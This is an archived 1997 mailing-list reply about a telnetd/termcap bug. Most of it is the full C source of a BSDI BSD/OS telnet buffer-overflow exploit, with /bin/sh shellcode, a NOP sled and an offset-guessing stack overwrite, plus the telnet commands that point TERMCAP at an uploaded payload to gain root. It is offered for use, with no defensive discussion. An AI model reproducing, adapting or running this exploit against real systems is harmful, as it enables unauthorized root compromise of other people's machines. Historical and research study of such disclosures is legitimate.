Re: in.telnetd bug (linux)

From: John Brahy (jbrahyat_private)
Date: Mon Dec 01 1997 - 06:24:55 PST


    There is a BSD exploit that works through the termcap file. It uses entries
    like this.
    
     telnet> env def TERM access
     telnet> env def TERMCAP /path/and/name/of/uploaded/file
     telnet> open victim.host.com
    
    and the source code is here:
    --------SNIP-----
    
    #include <stdlib.h>
    #include <unistd.h>
    #include <fcntl.h>
    
    #define filename "./termcap"
    #define entry   "access|Gimme r00t:\\\n :"
    #define bufsize 1300
    #define default_offset 870    /* Should work...*/
    
    char shellcode[] =
       "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
       "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
       "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
       "\x9a\x3e\x39\x29\x28\x39\x3c\xe8\xc6\xff\xff\xff/bin/sh";
    
    long get_sp(void)
    {
       __asm__("movl %esp, %eax\n");
    }
    
    int main(int argc, char *argv[]) {
       int i, fd, offs;
       long *bof_ptr;
       char *ptr, *buffer, *tempbuf;
    
       offs = default_offset;
    
       if(argc == 2) {
          printf("using offset: %d\n",atoi(argv[1]));
          offs = atoi(argv[1]);
       }
    
       if(!(buffer = malloc(bufsize))) {
          printf("can't allocate enough memory\n");
          exit(0);
       }
    
    
      if(!(tempbuf = malloc(bufsize+strlen(entry) + 50))) {
          printf("can't allocate enough memory\n");
          exit(0);
       }
    
       bof_ptr = (long *)buffer;
       for (i = 0; i < bufsize - 4; i += 4)
          *(bof_ptr++) = get_sp() - offs;
    
       ptr = (char *)buffer;
       for (i = 0; i < ((bufsize-strlen(shellcode)))/2 - 1; i++)
          *(ptr++) = 0x90;
    
       for (i = 0; i < strlen(shellcode); i++)
          *(ptr++) = shellcode[i];
    
       printf("Creating termcap file\n");
    
       snprintf(tempbuf, (bufsize+strlen(entry)+50), "%s%s:\n", entry,
    buffer);
       fd = open(filename, O_WRONLY|O_CREAT, 0666);
       write (fd, tempbuf, strlen(tempbuf));
       close(fd);
    }
    
    --------SNIP------------
    
    PEOPLE who actually wrote this:
    
    Bug originally discovered by Theo de Raadt <deraadtat_private>
    BSDI BSD/OS 2.1 telnet-exploit
    Written by Joseph_K the 22-Oct-1997
    Original shellcode by mudgeat_private but modified a tiny bit...
     _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _
    :_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:
                    _  _ _  _ _       ___  ____ _ _ _
                    |\ | |\ | |    __ |__] |    | | |
                    | \| | \| |___    |    |___ |_|_|
    
    _________________________________________________________________
                                    /
    John Brahy, CNA                /
    DeVry Institute of Technology /             Long Beach, California
    Computer Information Systems /  mailto://jbrahyat_private
     _   _   _   _   _   _   _  /_   _   _   _   _   _   _   _   _   _
    :_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:-:_:
    


